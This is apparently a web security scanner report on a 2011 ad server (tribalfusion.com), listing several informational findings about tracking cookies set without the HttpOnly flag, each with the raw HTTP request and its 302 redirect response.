Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=afnFkjmge0wRusnZd7gvZcatR8ZbEScUCBDXs0j0s50GZb1NZbNHr3QTUauwUM8tQU0eWCZcJwiaT9KOt0ORNDIPwt3Fos42FUhgEgkcn6gbVL7kcYVbsSviZdk498UHG7ll0UOmZaZd03oZbIohusjqYPAOg3P9l1qIXMOOyVcIdYGSRPUWps27MXI47gapuaKm0ivgosOIrnO096QZaussCUB9yqu346N7wR4whrspZaQTuAry7D0DqkWQuEMZaR6D4ZbKvKLDWR1PA8TDijB6RZdtTUZdBnYh8ux1FrrnNPB903ZctJ4lfVtpBjNHNWBwjlOdluDCCKqFZb2brZaMZdROFQhavZcTSkZdyPSbHOIZdVYOMeiosYkFhpmMgM8aIQbfHbK3G8o6QwPyQT1FryGQ8ZcM48FyrtZd8GDZc4sCV1LqZaikES5Zb1ggkhTpxsfVYrnmvEUmhbc9Yds87sZdpP1MHN80q6G6Yp1qE3IS34IhXlTBwHfMShFhrRxjZdx7ycmCBq19hfEiJSscR3Uui17SS4Za0eKOOMWnVRHQdSddDa40Pp8UaZayWOpLbvqshOIEwbP2XJRmnLmXutTHs2ViVDZb32EHl; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:53 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=ajnEV8OleoZcRnjwsvHjIGMPZaN3BhIGlMBwRu672jEu6kFEyVYSLZaT1XZcav235PM6yOYxJ7nrJA1MZaJUHaR62pMLDiXmu3aWrqyeDnmtflYj0wfKZb8B7Fs63ZddZdZaLVDVvNPZd2W5bZcKjgRbcSf1M89J0soZcMHZdsFJhAheI56MaCY7fHT7a9KTnZbJNl1fTCrWJyPwhCGiYp6RMZa86Zd02EMBZamuDrCiQITDnnYZbOt8hgqvwhN20MjRVIkW7WfQv5tNZb2h0ZaGLZaV3IEkQQQcWCxpuaZbRNhyWSKOco13Nky6g5KAAJfjStWxe12Go03g2hZdyAZd4xfblyvbvZajoMXsA6XGV4aJMbCDx17IY4NSpXehXEowhpweWH5d1bZb4rfD1THmXLmINObC9PiJTbRfvcuIZcJ0dZbDlZax6eLfViy5qgJrYZdLWIm5mnnxUbZarx8QgQq9ChvnAOFSErQfthcKcEGJKXKoU5EuIZcZdbpEGZbZbqoFkrZaS2YrLnIOQxR581u71Q9TZc8jaZc9qZdXBpup2owIsVqZcmlqeKD9oui0xJtoO2EYE2Zbv0tIeUSVMVHYpQSRDARMp; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:44 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ajnEV8OleoZcRnjwsvHjIGMPZaN3BhIGlMBwRu672jEu6kFEyVYSLZaT1XZcav235PM6yOYxJ7nrJA1MZaJUHaR62pMLDiXmu3aWrqyeDnmtflYj0wfKZb8B7Fs63ZddZdZaLVDVvNPZd2W5bZcKjgRbcSf1M89J0soZcMHZdsFJhAheI56MaCY7fHT7a9KTnZbJNl1fTCrWJyPwhCGiYp6RMZa86Zd02EMBZamuDrCiQITDnnYZbOt8hgqvwhN20MjRVIkW7WfQv5tNZb2h0ZaGLZaV3IEkQQQcWCxpuaZbRNhyWSKOco13Nky6g5KAAJfjStWxe12Go03g2hZdyAZd4xfblyvbvZajoMXsA6XGV4aJMbCDx17IY4NSpXehXEowhpweWH5d1bZb4rfD1THmXLmINObC9PiJTbRfvcuIZcJ0dZbDlZax6eLfViy5qgJrYZdLWIm5mnnxUbZarx8QgQq9ChvnAOFSErQfthcKcEGJKXKoU5EuIZcZdbpEGZbZbqoFkrZaS2YrLnIOQxR581u71Q9TZc8jaZc9qZdXBpup2owIsVqZcmlqeKD9oui0xJtoO2EYE2Zbv0tIeUSVMVHYpQSRDARMp; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:44 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=aEnEV8RZdyUICr3qo3l8XsI5ZcRo6I6xjOjhQ5uKm1iiJMfM0726IXTRUYfJUghfVCXxm0yJtpZbZd4Zb0CyrAt62xxnsMkYCVHkTjYa81BxnspI042r2ZcHMnZbUE86VFBkwRJxZaRqFK0Is6t1PBbPxM0ZbHKdF8tnaoRZau5wDW3C6KR0Va0UcgJXIc39WZc71amyidGV1hxrcRRZcbMQZa0fiEDAgaNsWeAO5Ns6HfI7h5s18wR6G9pI3L8ZbAIp39dfJNlPqNUNMpERECqFd0l0wFgPb2qFkwXIjOMZawPH5LhunWZbS2AtAuqYy3gUk1lm4hb5KmhG4QDmL4pLp2YEL1LYA7hSVprpPUKPBW6rGbZdNrXeErKoKUZdyBywdZaiuyeIXJlMTCPAaPHr6dNSZcGjVLnbCtobqRmTkvKd12pbhH1oNOQxZaHYvWZdZc3mB3ZcDmDaWWSYPOq0xxQl9DUWt1dMCpNN6iwKGWYlRUJR5nnhQmWAO4rBWEIETg7AMV0RpCIrbkb4a7q4CqZc2wcrfAjA87KV0jy2H8xYZchVmIN8ZbLQZd8cNKWTr6VwjH3mDqpdQ0WFYwbh; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:51 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aEnEV8RZdyUICr3qo3l8XsI5ZcRo6I6xjOjhQ5uKm1iiJMfM0726IXTRUYfJUghfVCXxm0yJtpZbZd4Zb0CyrAt62xxnsMkYCVHkTjYa81BxnspI042r2ZcHMnZbUE86VFBkwRJxZaRqFK0Is6t1PBbPxM0ZbHKdF8tnaoRZau5wDW3C6KR0Va0UcgJXIc39WZc71amyidGV1hxrcRRZcbMQZa0fiEDAgaNsWeAO5Ns6HfI7h5s18wR6G9pI3L8ZbAIp39dfJNlPqNUNMpERECqFd0l0wFgPb2qFkwXIjOMZawPH5LhunWZbS2AtAuqYy3gUk1lm4hb5KmhG4QDmL4pLp2YEL1LYA7hSVprpPUKPBW6rGbZdNrXeErKoKUZdyBywdZaiuyeIXJlMTCPAaPHr6dNSZcGjVLnbCtobqRmTkvKd12pbhH1oNOQxZaHYvWZdZc3mB3ZcDmDaWWSYPOq0xxQl9DUWt1dMCpNN6iwKGWYlRUJR5nnhQmWAO4rBWEIETg7AMV0RpCIrbkb4a7q4CqZc2wcrfAjA87KV0jy2H8xYZchVmIN8ZbLQZd8cNKWTr6VwjH3mDqpdQ0WFYwbh; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:51 GMT;
Content-Type: text/html
Location: http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=aqnEV8mMZaCZdBbyppueZbhWSY41SZaxuybZaZbZc0eZaUoy3QiiYimD2HZaJAPRKjZcRl18o8yiNh2E46Y8T4VZbElOZdTZcHjEHIuULbn1r2F67PPP3h7KIRyf4KZblWgDPZblIBZaZcfm0NLJ54NZaZdxEe6qaN0HikmvKNHsq8eZdjZbOaQ7LxprGZcZd6wKQb7Zdq3RZbZdmZb5MmHIVHrej8cN00muJvOCoZcfMNxTXAoobmIteubQjBje1Y9JyFofpoXXIimJcglFJaYgV5gn0Ya4xZc3Za2pcaE7jSmvLhQ7HMKVRBKK72sitAt0PZc3mB9oUslohhmFn7JEZajUiePTkX9AoQ050H9p1HokraeDt6he9hsuRoj7qhvfLbPmJVYNwV9PNcZdqcQ7X4qQhKsyQM7YnBm8Zd1hGykCnVd1mPmWMcC3JBpfqGpqIasmUh2lWxSdFX7ZcVZalXZarSxGoMAf29QQwcm1H1Ig2ciQ22bUZbpBPjWZanxtRtaY516plSnKbZbcuQcAeATpEXEFXyclifo3RbIRIXW1mwHhnrTjFtUF02paMtuhRtM4ZaPbGxZcIgFpkhZb3ARSSKsFXBZdCm5P; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:20 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aqnEV8mMZaCZdBbyppueZbhWSY41SZaxuybZaZbZc0eZaUoy3QiiYimD2HZaJAPRKjZcRl18o8yiNh2E46Y8T4VZbElOZdTZcHjEHIuULbn1r2F67PPP3h7KIRyf4KZblWgDPZblIBZaZcfm0NLJ54NZaZdxEe6qaN0HikmvKNHsq8eZdjZbOaQ7LxprGZcZd6wKQb7Zdq3RZbZdmZb5MmHIVHrej8cN00muJvOCoZcfMNxTXAoobmIteubQjBje1Y9JyFofpoXXIimJcglFJaYgV5gn0Ya4xZc3Za2pcaE7jSmvLhQ7HMKVRBKK72sitAt0PZc3mB9oUslohhmFn7JEZajUiePTkX9AoQ050H9p1HokraeDt6he9hsuRoj7qhvfLbPmJVYNwV9PNcZdqcQ7X4qQhKsyQM7YnBm8Zd1hGykCnVd1mPmWMcC3JBpfqGpqIasmUh2lWxSdFX7ZcVZalXZarSxGoMAf29QQwcm1H1Ig2ciQ22bUZbpBPjWZanxtRtaY516plSnKbZbcuQcAeATpEXEFXyclifo3RbIRIXW1mwHhnrTjFtUF02paMtuhRtM4ZaPbGxZcIgFpkhZb3ARSSKsFXBZdCm5P; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:20 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=agnhF4SkTAF8iiw8fQKkDVov5ZaVtL4kAJJHuly8Q36RZdu9P8pbfCuSisKOZcKDQXiFTKbrMRNxbBWMLZc4nZcoT0pGB6BrXuUjkmNittGpjkC1xZdD9VcwQUjOl7oyFNhBoOZacm4lY8LwxcYRyGe8NT5QuZaid1S5eljpmQOJ4bQX0HdqPu0oyM7tW6LZcSZdbxkrgktqi5TrhmfRAg5KVQr6jydWeHapkSCorEY5oPPOltPZcjFH4ZcUecfVxg0mrIVGjWcQCJ7k1UAnLdnYyYE2ZccSkhge3hadCbJBYbqd17D9VI4DOSZbD8UNhRfV45JZct312BhBZaITIPBpoQBn8der0fFh4FTS6gl035o36yY73spFfW0SiTyjx0noZbZaZcQIFvxbGBf6uePjMuPtZbrfOEZbdZdsTTdqE6OpUZdBVmMdgZavYrZdcZbZbsr6DVJnXvdXZcWKCpFK8RTvU5qFce0bTXsQwsfW0ktQrmyTbRXsgHZc7; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:45 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=agnhF4SkTAF8iiw8fQKkDVov5ZaVtL4kAJJHuly8Q36RZdu9P8pbfCuSisKOZcKDQXiFTKbrMRNxbBWMLZc4nZcoT0pGB6BrXuUjkmNittGpjkC1xZdD9VcwQUjOl7oyFNhBoOZacm4lY8LwxcYRyGe8NT5QuZaid1S5eljpmQOJ4bQX0HdqPu0oyM7tW6LZcSZdbxkrgktqi5TrhmfRAg5KVQr6jydWeHapkSCorEY5oPPOltPZcjFH4ZcUecfVxg0mrIVGjWcQCJ7k1UAnLdnYyYE2ZccSkhge3hadCbJBYbqd17D9VI4DOSZbD8UNhRfV45JZct312BhBZaITIPBpoQBn8der0fFh4FTS6gl035o36yY73spFfW0SiTyjx0noZbZaZcQIFvxbGBf6uePjMuPtZbrfOEZbdZdsTTdqE6OpUZdBVmMdgZavYrZdcZbZbsr6DVJnXvdXZcWKCpFK8RTvU5qFce0bTXsQwsfW0ktQrmyTbRXsgHZc7; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:45 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=aHnEGcolXPBpF5ICZbx9eCRAPU5GNZaF4esKR22lZaqg7mRb7CZdHxWKvM0xob5KTsmd3pZbZdKGx1XC5rL2mW9GXWvUHE9wZdxDkDW4Svj0H7X4Md5lVbgcpfmldHkYSFDS7VqmNxr2XZaWuendWENLdpZbLYObWxOZbRJfF7iQLWd5n43u5HhPLmEiEwvZburLVZakYh4ZcXFQLAgcIV1TtkpCw2oLw1SmxdfZd4AvD0yyZdTwh4T5NWhXMgyCgTgPiK3gheN7n4wofOZcJucGWT5oTAcZdG6c9AuuA2a8ghEO2d8AN0Gb4OABdCZbZaI7E95PtrxZcgD8pEHZbeeRw7QvJSZaBvuBNxsXNj2AN3M1tMGMZdGs71OXnZb4UMlQssGfEQBhhmRZcgGoSxbMZcf6ZdZc3jFvIGM8wVWfIVsvkQNpsgI1JZcUl8RJ5IUutjMfIN7RRJcjTGTwVwBurbbOYwW229i5YvxCZdqjACVhhAgKpEWlL6wv7ZaDaRtgSKLJZacsZcJSIG5MpSc29ynKmOb3ZcZcZdruPaS9p2DvnSnO8dplAA6J7jabf3nWcVK7eBX1Zd8vmh4QUNqQ65qyIQMMQCpAu; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:52 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aHnEGcolXPBpF5ICZbx9eCRAPU5GNZaF4esKR22lZaqg7mRb7CZdHxWKvM0xob5KTsmd3pZbZdKGx1XC5rL2mW9GXWvUHE9wZdxDkDW4Svj0H7X4Md5lVbgcpfmldHkYSFDS7VqmNxr2XZaWuendWENLdpZbLYObWxOZbRJfF7iQLWd5n43u5HhPLmEiEwvZburLVZakYh4ZcXFQLAgcIV1TtkpCw2oLw1SmxdfZd4AvD0yyZdTwh4T5NWhXMgyCgTgPiK3gheN7n4wofOZcJucGWT5oTAcZdG6c9AuuA2a8ghEO2d8AN0Gb4OABdCZbZaI7E95PtrxZcgD8pEHZbeeRw7QvJSZaBvuBNxsXNj2AN3M1tMGMZdGs71OXnZb4UMlQssGfEQBhhmRZcgGoSxbMZcf6ZdZc3jFvIGM8wVWfIVsvkQNpsgI1JZcUl8RJ5IUutjMfIN7RRJcjTGTwVwBurbbOYwW229i5YvxCZdqjACVhhAgKpEWlL6wv7ZaDaRtgSKLJZacsZcJSIG5MpSc29ynKmOb3ZcZcZdruPaS9p2DvnSnO8dplAA6J7jabf3nWcVK7eBX1Zd8vmh4QUNqQ65qyIQMMQCpAu; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:52 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

